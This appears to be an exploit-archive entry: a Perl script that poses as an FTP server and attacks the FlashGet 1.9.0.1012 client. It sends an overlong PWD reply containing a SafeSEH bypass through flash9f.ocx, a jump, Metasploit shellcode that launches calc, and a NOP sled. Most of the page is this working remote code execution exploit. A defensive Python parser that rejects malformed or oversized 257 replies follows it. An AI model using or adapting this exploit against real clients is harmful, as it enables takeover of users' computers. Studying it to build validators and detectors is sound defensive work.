FlashGet 1.9.0.1012 (FTP PWD Response) BOF Exploit (safeseh)

#!/usr/bin/perl

# k`sOSe 08/17/2008
# bypass safeseh using flash9f.ocx.

use warnings;
use strict;
use IO::Socket;

# win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com

my $shellcode =

"x31xc9x83xe9xdexd9xeexd9x74x24xf4x5bx81x73x13x6b".

"xa3x03x10x83xebxfcxe2xf4x97x4bx47x10x6bxa3x88x55".

"x57x28x7fx15x13xa2xecx9bx24xbbx88x4fx4bxa2xe8x59".

"xe0x97x88x11x85x92xc3x89xc7x27xc3x64x6cx62xc9x1d".

"x6ax61xe8xe4x50xf7x27x14x1ex46x88x4fx4fxa2xe8x76".

"xe0xafx48x9bx34xbfx02xfbxe0xbfx88x11x80x2ax5fx34".

"x6fx60x32xd0x0fx28x43x20xeex63x7bx1cxe0xe3x0fx9b".

"x1bxbfxaex9bx03xabxe8x19xe0x23xb3x10x6bxa3x88x78".

"x57xfcx32xe6x0bxf5x8axe8xe8x63x78x40x03x53x89x14".

"x34xcbx9bxeexe1xadx54xefx8cxc0x62x7cx08xa3x03x10";

# Listen on the FTP control port and wait for the client to connect.
my $sock = IO::Socket::INET->new(
    LocalAddr => '0.0.0.0',
    LocalPort => '21',
    Listen    => 1,
    Reuse     => 1,
);

while (my $csock = $sock->accept())
{
    # Answer the login sequence, then send the oversized 257 (PWD) reply.
    print $csock "220 Hello ;)\r\n";
    read_sock($csock);
    print $csock "331 pwd please\r\n";
    read_sock($csock);
    print $csock "230 OK\r\n";
    read_sock($csock);
    print $csock "250 CWD command successful.\r\n";
    read_sock($csock);
    print $csock "257 " . "\x22" .
        "\x41" x 324 .
        "\xEB\x06\x90\x90" .   # jump ahead
        "\x82\x01\x02\x30" .   # pop,pop,ret @ flash9f.ocx, thanks macromedia for avoiding /SAFESEH ;)
        $shellcode .
        "\x90" x 840 .
        "\x22" .
        " is current directory.\r\n";
    close($csock);
    exit;
}

# Read one line from the client and echo it to the console.
sub read_sock
{
    my ($sock) = @_;
    my $buf = <$sock>;
    print "[client] -> $buf";
}
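
The script above reaches the client through the quoted directory name in the FTP 257 (PWD) reply. As an added example (not part of the original script, and not FlashGet's code), here is a client-side parser that bounds and validates that reply before the directory name is used; the size limits and the UTF-8 policy are assumptions.

```python
import re

# Assumed policy limits (not taken from the page or from FlashGet).
MAX_REPLY_LEN = 512   # bytes in one reply line, CRLF included
MAX_PATH_LEN = 255    # bytes in the unquoted directory name

# RFC 959: 257 "<directory>" <free text>; a quote inside the name is doubled.
PWD_RE = re.compile(rb'257 "((?:[^"]|"")*)"[^\r\n]*\r\n')


class BadPwdReply(ValueError):
    """Raised when a 257 reply violates the format or the size policy."""


def parse_pwd_reply(line: bytes) -> str:
    """Return the directory from a 257 reply, or raise BadPwdReply."""
    # Check the length first, before any copying or parsing of the contents.
    if len(line) > MAX_REPLY_LEN:
        raise BadPwdReply(f"reply is {len(line)} bytes, limit {MAX_REPLY_LEN}")
    m = PWD_RE.fullmatch(line)
    if m is None:
        raise BadPwdReply("not a well-formed 257 reply")
    path = m.group(1).replace(b'""', b'"')
    if len(path) > MAX_PATH_LEN:
        raise BadPwdReply(f"path is {len(path)} bytes, limit {MAX_PATH_LEN}")
    if any(b < 0x20 or b == 0x7F for b in path):
        raise BadPwdReply("control byte in path")
    try:
        return path.decode("utf-8")
    except UnicodeDecodeError as exc:
        raise BadPwdReply("path is not valid UTF-8") from exc


# Constructed sample replies (filler bytes only, no payload).
# 1332 = 324 + 4 + 4 + 160 + 840, the length of the name the script above builds.
SAMPLES = {
    "normal": b'257 "/pub/files" is current directory.\r\n',
    "quoted": b'257 "/a""b" is current directory.\r\n',
    "oversized": b'257 "' + b"A" * 1332 + b'" is current directory.\r\n',
    "binary": b'257 "/pub\x90\x90\xeb" is current directory.\r\n',
}

if __name__ == "__main__":
    for name, raw in SAMPLES.items():
        try:
            print(name, "->", repr(parse_pwd_reply(raw)))
        except BadPwdReply as err:
            print(name, "-> rejected:", err)
```

The same checks can run in a network sensor on the FTP control channel, where a 257 reply rejected by this parser is worth an alert.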
